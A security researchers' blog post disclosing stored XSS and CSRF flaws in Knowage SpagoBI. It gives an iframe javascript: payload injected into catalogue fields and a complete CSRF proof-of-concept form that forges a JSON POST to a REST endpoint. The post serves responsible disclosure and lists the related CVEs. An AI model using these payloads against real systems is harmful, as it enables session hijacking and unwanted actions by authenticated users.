Security Issues on Knowage SpagoBI

While researching the platform, my coworkers Edward Amaral and Luca Ottoni and I, security researchers from STOLabs, found some security issues in SpagoBI from Knowage.

Lucas Carmo
stolabs
3 min read, Sep 12, 2018


Those vulnerabilities were:

  • Stored Cross-Site Scripting (Stored XSS)
  • Cross-Site Request Forgery (CSRF)

Before we begin, I would like to thank the Knowage company for being extremely solicitous and grateful for the research, and for exposing our work on their security patch page (https://www.knowage-suite.com/site/network/contributors).

First, I would like to explain a bit about Cross-Site Scripting (XSS).

Cross-Site Scripting (XSS) attacks are a type of injection in which malicious scripts are injected into otherwise benign and trusted web sites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser-side script, to a different end user. Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.

An attacker can use XSS to send a malicious script to an unsuspecting user. The end user’s browser has no way to know that the script should not be trusted, and will execute the script. Because it thinks the script came from a trusted source, the malicious script can access any cookies, session tokens, or other sensitive information retained by the browser and used with that site. These scripts can even rewrite the content of the HTML page.

For more reading about the issue, see https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)

In the proofs of concept reported below I've put a script tag with an alert showing the string 'XSS', just to illustrate the issue.

That being said, let's start the report!

1- Multiple Stored XSS

The first cross-site script was in the name input of the "Business Model's Catalogue".

The payload used was: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Stored XSS on the Business Model's Catalogue

The second cross-site script was in the name and description inputs of the "Olap Schemas' catalogue".

The payload used was: <IFRAME SRC="javascript:alert('XSS');"></IFRAME>

Stored XSS on the Olap Schemas' catalogue

2- Cross-Site Request Forgery

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help from social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state-changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

This flaw could be seen on every form in the application; one example is the /knowage/restful-services/2.0/analyticalDrivers/ path.

With the example code below, we forged a request to the server; because the browser attaches the user's session cookies automatically, the request is processed without the user knowing.

<html>
  <body>
    <!-- Rewrite the address bar so the page shows the site root -->
    <script>history.pushState('', '', '/')</script>
    <!-- text/plain encoding sends "name=value"; the JSON is placed in the field name -->
    <form action="http://<IP>:8080/knowage/restful-services/2.0/analyticalDrivers/" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;type&quot;&#58;&quot;NUM&quot;&#44;&quot;functional&quot;&#58;true&#44;&quot;name&quot;&#58;&quot;TEST&#95;CSRF&quot;&#44;&quot;description&quot;&#58;&quot;TESTING&#95;OF&#95;CSRF&#95;POC&quot;&#44;&quot;temporal&quot;&#58;true&#44;&quot;label&quot;&#58;&quot;TestCSRF&quot;&#44;&quot;length&quot;&#58;0&#44;&quot;typeId&quot;&#58;29&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

CVEs related to this post:

CVE-2018-12353: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12353

CVE-2018-12354: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12354

CVE-2018-12355: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12355
